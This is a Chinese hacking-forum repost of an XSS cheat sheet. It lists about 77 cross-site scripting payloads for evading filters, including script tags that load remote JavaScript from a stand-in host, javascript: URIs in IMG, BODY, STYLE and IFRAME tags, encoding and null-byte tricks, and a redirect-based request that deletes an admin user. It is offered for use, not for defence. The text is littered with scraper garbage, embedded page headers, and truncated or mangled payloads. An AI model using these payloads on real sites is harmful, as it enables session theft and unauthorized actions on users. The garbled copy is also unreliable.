貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
( ? {7 C& m' v% b1 B" L [(1)普通的XSS JavaScript注入
" n) V- n0 f# \<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, ]) b4 b2 v5 W6 t5 u(2)IMG标签XSS使用JavaScript命令
$ i3 p; e j$ p& A5 P8 c<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> P+ ?# _4 h0 X2 J- Q4 F
(3)IMG标签无分号无引号
/ W" x8 R2 o! y5 b<IMG SRC=javascript:alert(‘XSS’)>! A- {) H7 |6 d( n: I* K( L! l$ a
(4)IMG标签大小写不敏感
5 ^! J% u3 T$ u3 D# t3 |<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ K' Y! d( u0 C(5)HTML编码(必须有分号)
8 |* ?. f8 E. q: {/ J" _$ h3 T<IMG SRC=javascript:alert(“XSS”)>
+ f' J. Q" U9 o w3 _) J2 p(6)修正缺陷IMG标签
- G% ^5 ?" {- u# _3 _( C& b i& v<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>3 t9 R A( B: U/ D# [& K1 k$ z" n
- ^4 e% q0 N& {) T- L' J* J, u% E
0 b# C5 q$ W) D- ?, z8 E
(7)formCharCode标签(计算器)
# Q7 j v4 L1 j( w1 N+ G<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
/ ]6 ]1 O; P7 ?( G(8)UTF-8的Unicode编码(计算器)0 D. V" \! p; A9 b
<IMG SRC=jav..省略..S')>
( G @: w( u8 p0 N( A( O0 L" y(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
9 j# K3 |4 y8 C5 E. D<IMG SRC=jav..省略..S')>
+ {; ^8 o. A) }6 O- w; ](10)十六进制编码也是没有分号(计算器)1 ?& c r! L2 M
<IMG SRC=java..省略..XSS')>7 H2 A! B( F( {7 Y; f& ?
(11)嵌入式标签,将Javascript分开( l* P: z% h' j. v; b# D O$ s
<IMG SRC=”jav ascript:alert(‘XSS’);”>
. K2 M& ]/ P2 }(12)嵌入式编码标签,将Javascript分开9 @& B5 m/ X) L, c: V4 g) K( W Y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# D4 t" O7 q/ \: x(13)嵌入式换行符& }5 I: x7 W1 P0 m. q( F# T
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 a8 \, P; q; q7 S: y8 e7 M
(14)嵌入式回车
; V! w1 V" B: r' H9 v+ O<IMG SRC=”jav ascript:alert(‘XSS’);”>' E+ g) h+ j! G, S
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
! W& i; i; H" a U; l<IMG SRC=”javascript:alert(‘XSS‘)”>$ }# s% ?5 f1 p; w r; P# A* z
(16)解决限制字符(要求同页面)
* p+ f+ \$ A% n<script>z=’document.’</script>
) }+ G( X9 W @0 S! [/ \2 S9 U<script>z=z+’write(“‘</script>- E. `* D6 y% \% \/ B2 Z, t
<script>z=z+’<script’</script>
' z5 T2 p, o$ j6 D<script>z=z+’ src=ht’</script>5 R% _- x3 }" C
<script>z=z+’tp://ww’</script>5 l3 E1 q, w5 e/ o' W* G
<script>z=z+’w.shell’</script>. l- d# r9 T- ]9 k
<script>z=z+’.net/1.’</script>& H' d8 i( H- Z$ {6 u; N7 d
<script>z=z+’js></sc’</script>- @, ^8 U9 S2 S2 |8 c
<script>z=z+’ript>”)’</script>
$ D& X w: R3 A* P' d7 a<script>eval_r(z)</script>
6 e! C, ~2 R I/ D( K% V- h6 P: X(17)空字符12-7-1 T00LS - Powered by Discuz! Board; B1 Z+ J8 f, x. L! a# K
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
1 O/ \% A) f- J o0 [* Eperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
/ p: \1 ?/ e6 g& h4 h(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
3 P @! ^! w, P; U- xperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# j* y- u/ t4 w/ \# }3 Y
(19)Spaces和meta前的IMG标签) D6 g# J" j2 R+ [9 e6 j
<IMG SRC=” javascript:alert(‘XSS’);”>. [1 ^" E! X- g5 v6 ]* C8 B
(20)Non-alpha-non-digit XSS, D( M7 G' B% b3 v! i) |; ] x
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>5 W2 Y& V$ t( g" [7 r
(21)Non-alpha-non-digit XSS to 26 B' ]: J8 M! y& a8 C
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
: C, M: R7 A) ]6 }8 s(22)Non-alpha-non-digit XSS to 3
3 b: d `5 l( k. U" G2 S; `<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
1 F9 Y7 ]8 R, {( t% h7 T(23)双开括号
4 o# g/ n! {) W$ \; U1 j, B+ n<<SCRIPT>alert(“XSS”);//<</SCRIPT>
" d) A }2 H, _$ ]- r; q(24)无结束脚本标记(仅火狐等浏览器)
: o2 L% A3 N( I% w8 a" o4 q3 I2 Q<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
+ O! ^. ]; s0 B' n$ A, F7 u7 C(25)无结束脚本标记2
) h! T$ F! ~4 e; U& g5 W/ ~<SCRIPT SRC=//3w.org/XSS/xss.js>* h1 Y* N5 V7 M* e& Y% O
(26)半开的HTML/JavaScript XSS
# x( [% ~1 [/ ^/ E0 c4 `<IMG SRC=”javascript:alert(‘XSS’)”" w& A* ]$ t1 a
(27)双开角括号, ?/ g2 x3 i) p1 T
<iframe src=http://3w.org/XSS.html <8 D T# d* X4 J# K _( \
(28)无单引号 双引号 分号1 C6 |& `8 G; N6 l( d0 k3 B
<SCRIPT>a=/XSS/( j. w9 I5 G6 T
alert(a.source)</SCRIPT>( [" n/ C3 K) B6 e! ~. P0 q
(29)换码过滤的JavaScript' ~- g; A; m8 E1 H& H/ b
\”;alert(‘XSS’);//9 W& K2 d! k. Y
(30)结束Title标签
) |4 m/ a& `6 e. y+ d: c</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
5 Y i" k+ a7 Z6 E(31)Input Image) J6 F) K7 q/ q+ i/ R* x
<INPUT SRC=”javascript:alert(‘XSS’);”>4 b7 ~1 _0 M# T, V: d7 E, ]
(32)BODY Image# Z! r& O) T3 n6 ~! v9 W9 r+ U' v
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
" g$ k/ o- u" m(33)BODY标签# k1 ~4 \, ^- @4 ~
<BODY(‘XSS’)>
3 E v6 G' Z6 q5 z9 n0 p0 O(34)IMG Dynsrc3 m! f, U. c0 @3 h, n+ @- I' {
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
$ b* _0 \# `) m8 J, `(35)IMG Lowsrc( G; [2 Q! Y, w. j6 f* d& a
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
`% E* K( \ p. Z4 A9 `0 u2 k(36)BGSOUND
9 ^! }- Y$ r& R<BGSOUND SRC=”javascript:alert(‘XSS’);”> v- q) u0 S) n5 _; p
(37)STYLE sheet% Y- z8 p$ [1 y- z* _3 F
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 J: ]$ ^) M0 ^) W8 d(38)远程样式表
3 L6 M* A+ I- u3 U& x2 ]4 Y<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>, H: R2 N& m0 {# B$ m/ @. @: `
(39)List-style-image(列表式)
2 d( D! g) z d, K+ ^( F) q( ]<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS% q. n2 l/ ~* {2 s$ U4 l6 t; O2 T
(40)IMG VBscript
' \" @# X% Q+ I<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
/ _, z7 i8 _- P; k& D(41)META链接url
. Y( p% z# ]% U. x, P# C! y4 ]. `* d" W: ]# N; G0 s! C. z
/ K* V; K) p5 ?& ], S% D* R2 c! _9 q<META HTTP-EQUIV=”refresh” CONTENT=”0;6 e* w) X5 ~1 E
URL=http://;URL=javascript:alert(‘XSS’);”>
9 I0 c8 h6 u& z; Z(42)Iframe
/ N' t& s$ L1 z* b$ Y<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
, z6 z; _2 R* S. l) U Z(43)Frame
- b" j, d+ [ u/ Z<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board/ q( x$ q/ I t4 u3 s$ N
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
. d! a8 v: F z/ b# {, X& X(44)Table
3 J# h+ F4 l) E; C. w. \. n<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
+ X3 M8 R- y' \; i$ U; G: h(45)TD
6 Z/ n. [- p. j5 W) O5 {0 G7 j( I2 |' o<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>2 ]' o; a: b3 s, D# t# c
(46)DIV background-image
$ K0 }6 H" S3 v: k9 p; P<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
% L7 E s! e; I7 f$ g& O(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
: V; [/ B* f1 ~6 E( o, S/ _8&13&12288&65279)
6 W4 |( s+ L/ k! `, A1 |. ]<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ e b9 h: f+ y4 t' J(48)DIV expression4 G) h7 p. M5 |
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& h) {6 f$ l. B6 |
(49)STYLE属性分拆表达% K/ W8 s9 _$ U/ g t
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”> h5 U: j( O: J; x' U
(50)匿名STYLE(组成:开角号和一个字母开头)
, ]6 e1 f @% V% q9 o<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>6 x, g' v4 e0 s. u
(51)STYLE background-image7 X/ i$ ~5 b3 h2 p! T
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A2 n G9 h# u% O/ V+ \
CLASS=XSS></A>; @2 j% r& r! C/ x$ I9 i' T
(52)IMG STYLE方式; S) o, E- s1 w9 Q/ C1 k
exppression(alert(“XSS”))’>
4 B( S( i1 t- V6 Y* Z+ }2 T9 O(53)STYLE background
+ B" N: P& o, h: u$ I4 N; j x<STYLE><STYLE* _) W1 l, V P6 I
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>8 h2 @8 f- e; Y3 Q/ k
(54)BASE$ b* P3 a+ u! ?3 G
<BASE HREF=”javascript:alert(‘XSS’);//”>
" V* V7 E3 `; b! }* c(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS; A a5 ?, F: v! l" q5 j
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>: x5 d. F. M) b) H$ [
(56)在flash中使用ActionScrpt可以混进你XSS的代码
- @( i/ }+ U3 \a=”get”;
( L8 G! \* I) l/ x% S4 n1 r2 Ib=”URL(\”";4 Y+ B, B$ l3 ~# w4 h% \
c=”javascript:”; Q) M1 J. n2 E) r3 q
d=”alert(‘XSS’);\”)”;9 S0 s! T9 `* Y4 y& ~3 W( Z
eval_r(a+b+c+d);% e( R6 O7 j. ]) \' z1 d' X) }% d
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上$ ? d7 t; t# x- m4 H8 x. z0 A
<HTML xmlns:xss>
+ `. K4 \1 `! u) R6 Q<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>: j) O9 j. Y/ ]: U+ J: j/ E" A& i
<xss:xss>XSS</xss:xss>
6 s' Q; u2 ]: |2 U! k6 a, a5 s1 i1 y</HTML>% A% a' i, b. d7 i
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用; R, F, J2 L% s$ O* V
<SCRIPT SRC=””></SCRIPT>
* L# W+ y2 x4 y& q(59)IMG嵌入式命令,可执行任意命令
* S& M7 b- k4 d$ c/ s3 \9 t) u( S<IMG SRC=”http://www.XXX.com/a.php?a=b”>" O, R5 h* L8 X9 @5 g! @
(60)IMG嵌入式命令(a.jpg在同服务器)+ ^6 j/ z& ^5 q2 P: Y6 U& J
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser/ m/ O/ I# e0 T% p- A
(61)绕符号过滤1 @$ [. I* ~3 l7 S, b8 r
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, z. H. s, B( q) i0 e, a2 E(62)
) M( w* x( h$ T' b% P4 p; @' V* Q<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>% z3 s5 K( _! |3 e
(63)9 \, r1 H# s' \+ X& [8 U
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>. D! ]0 t r% d2 v6 [9 Z+ R0 S' Y
(64)
9 q h4 ~$ L0 `# v* J<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>7 J2 X7 ]/ X: N7 c/ @
(65)
* ^0 o6 ^" L, S% J! o1 L% _<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
6 _0 e9 ?6 L# O! b8 o(66)12-7-1 T00LS - Powered by Discuz! Board7 J5 q& }3 X6 h; H' g3 O6 d! L
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
% }2 s+ _5 _& Y( d<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>$ B4 | R0 R4 E9 F% d: z
(67)5 p4 l* L L$ e9 {) {
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>4 l' b+ G- T, U* [$ M1 e
</SCRIPT>
) K/ J5 Y4 K& z# e- {(68)URL绕行
& K( g7 a& R g% `1 S) t' u6 k. W2 ~<A HREF=”http://127.0.0.1/”>XSS</A>
6 Z6 w* S; l" x9 L L# D, }(69)URL编码
# O! _7 Z9 J% G. Z! {0 R<A HREF=”http://3w.org”>XSS</A>& x8 }6 n! f. Y' K- O" P8 y
(70)IP十进制1 a; [; p" j0 d8 Q2 S }
<A HREF=”http://3232235521″>XSS</A>
3 D4 R. F) Y7 w. O: Y(71)IP十六进制 L7 D$ U- ^: W. B7 ~0 I2 f
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A> ]' K% n, J0 d6 P2 L8 E
(72)IP八进制
0 Q4 i, m9 h a) z z8 w<A HREF=”http://0300.0250.0000.0001″>XSS</A>
! I9 x' z4 y8 F5 C" M% N5 S* V(73)混合编码
. l3 h- o5 k# T# n& Q4 R6 K4 ]<A HREF=”h- n* d7 I5 u7 _# a
tt p://6 6.000146.0×7.147/”">XSS</A>( b) j5 `7 p& t( U, t% C9 @
(74)节省[http:]
! O8 x9 {7 ~6 i<A HREF=”//www.google.com/”>XSS</A>8 g5 y M, b+ U8 ^: Y
(75)节省[www]- @9 l0 |8 H* T" L
<A HREF=”http://google.com/”>XSS</A>8 ~. U' g$ G5 b4 K9 {2 L
(76)绝对点绝对DNS7 D& J, b; B M' C1 s
<A HREF=”http://www.google.com./”>XSS</A>1 a' s# [ T, y" C1 |3 }* d7 ]
(77)javascript链接+ F0 V R# Q* [0 ~) Y: n; ]
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
: ?7 v9 o7 i: P0 H- I0 L( m5 t, \8 v
原文地址:http://fuzzexp.org/u/0day/?p=144 c+ Q1 a9 w5 V4 V
" z; h% R9 S' s$ v: i" W |
发表于 2013-4-19 19:22:37
收藏
支持
反对